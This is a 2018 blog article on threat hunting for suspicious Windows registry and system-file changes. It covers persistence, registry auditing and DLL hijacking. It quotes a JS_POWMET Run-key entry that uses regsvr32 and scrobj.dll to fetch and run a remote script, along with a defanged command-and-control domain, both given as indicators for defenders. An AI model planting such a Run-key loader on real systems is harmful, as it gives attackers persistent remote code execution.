Threat Hunting for Suspicious Registry and System File Changes

July 21, 2018 by

Greg Belding

Information security professionals are normally tasked with hunting threats that have been detected on their respective networks. What happens when you think that your network is under attack, but you’re not quite sure where the malware is or what they will do next? This article will detail how to threat hunt on your network by analyzing suspicious registry and system file changes.

Indicators of Compromise

Indicators of Compromise, or IoCs, are pieces of forensic data that are normally found in system files and log entries, and which identify potential threat activity on a network or system. In other words, information security professionals can use IoCs as a trail of evidence, like a trail of breadcrumbs, to determine where the attacks are occurring and the attack patterns they are faced with.

Become a certified threat hunter

Learn how to find, assess and remove threats from your organization — and become a Certified Cyber Threat Hunting Professional, guaranteed!

Get Pricing

Suspicious Registry and System File Changes are Indicators of Compromise

Suspicious registry and system file changes are used as part of the standard 10 to 15 IoCs that  information security professionals use when threat hunting. One of the reasons they qualify as IoCs is that cybercriminals need to establish persistence within an infected host on a network via registry changes and system file changes.

What is Persistence?

If the malware on a host is not active, it needs to be triggered to run at a future point in time. This mechanism is called a persistence mechanism. Commonly used examples of persistence mechanisms include AutoStart locations in the registry, scheduled tasks/cronjobs and boot process redirection. Malware sometimes needs to be triggered with a persistence mechanism before it can start leaving a trail of evidence for information security professionals to begin investigating.

Threat-Hunting Suspicious Registry Changes

The best place to start in threat hunting, in this case, is by searching in the registry itself. How do we begin to threat hunt when an embedded piece of malware is not performing any activity?

To accomplish this, you will have to recognize common persistence locations and analyze any data that this produces. This data will include commands, files referenced, and code. It is well known that a registry can be large and quite daunting to those who do not work with registries and the entire registry is not the universe that you will be working with, so do not worry.

Within the registry, you will want to begin with analyzing the registry run keys and scheduled tasks. This will have to be performed without much use of your current endpoint antivirus software, as most antivirus solutions do not scan for persistence mechanisms. With that said, the best places to start will be systems containing high-value data, data controllers and other strategic assets such as infrastructure servers. This portion of the investigation should be approached with realistic expectations because you may only find cursory evidence that is of not much help.

If you haven’t found what you were looking for, try enabling registry auditing. This is a built-in service from Microsoft, so this will obviously only apply to Windows users.

Enabling registry auditing is a two-step process. You will have to first enable registry auditing via Windows Event Logger. You can accomplish this by first going into Active Directory or local group policy to enable the Audit Registry option in the Object Access subcategory under Advanced Auditing Policy Configuration at the following location: Computer Configuration > Windows Settings > Security Settings. Then, enable the Success and Failure options.

The second step is you must run Regedit.exe, manually right-click on each registry key that you want to audit, select permissions, click on the Advanced button, and then select the Auditing tab. Within the Auditing tab, add the Everyone group as the principle group to audit and select Show Advanced Permissions. Once you are in advanced permissions enable the following: Set Value, Create Subkey, Create Link, Write DAC and Write Owner. Keep in mind that you will have to perform this process on every registry key that you want to audit.

Suspicious Registry Changes

One type of registry change that has seen a resurgence of late are attacks classified as file-less malware. A recent example is called JS_POWMET and shows up via an AutoStart registry procedure by way of infected USB drives. This is difficult to analyze using a sandbox, and 90% of these attacks originate in the Asia-Pacific region.

The following is an example of JS_POWMET. This example was downloaded via an AutoStart registry procedure that changed the registry by the time that it was downloaded onto the system:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”

Once run, this will install a PowerShell script backdoor Trojan onto the system, this one will install TROJ_PSINJECT and will connect to the following website:

hxxps://bogerando[.]ru/favicon

Very suspicious indeed. Suspicious USB drives should not be inserted into workstations, and USB drives should be scanned by the organization’s local antivirus solution. In addition, threat hunters may want to disable PowerShell to help mitigate the effects of JS_POWMET.

System File Changes

Existing system files are another target of attackers. A common system file change is DLL Hijacking.

This type of attack replaces a DLL file existing on a system with a bogus DLL file containing malicious code. This attack works by being placed into a higher priority folder than most of the “good DLLs,” making the system use the bad DLL file instead of a good one.

DLL Hijacking attacks are easiest to detect with third-party tools. A great tool to use to detect DLL Hijack attacks is called DLL_HIJACK_DETECT, and you can find it on GitHub. DLL_HIJACK_DETECT checks applications on your system for potential vulnerability to DLL hijacking. If any application is found to be vulnerable, it informs the user. This product is available in both x86 and x64 versions.

Sources

List of Types of Malware, MalwareFox

Infected with malware? Check your Windows registry, CSO Online

Windows Registry Attacks: Knowledge Is the Best Defense, Red Canary

Indicators of Compromise and Attack, Sage Advice

Top 15 Indicators of Compromise, Dark Reading

A Look at JS_POWMET, a Completely Fileless Malware, Trend Micro

Become a certified threat hunter

Learn how to find, assess and remove threats from your organization — and become a Certified Cyber Threat Hunting Professional, guaranteed!

Get Pricing

DLL Hijacking Vulnerability Attacks, Prevention & Detection, The Windows Club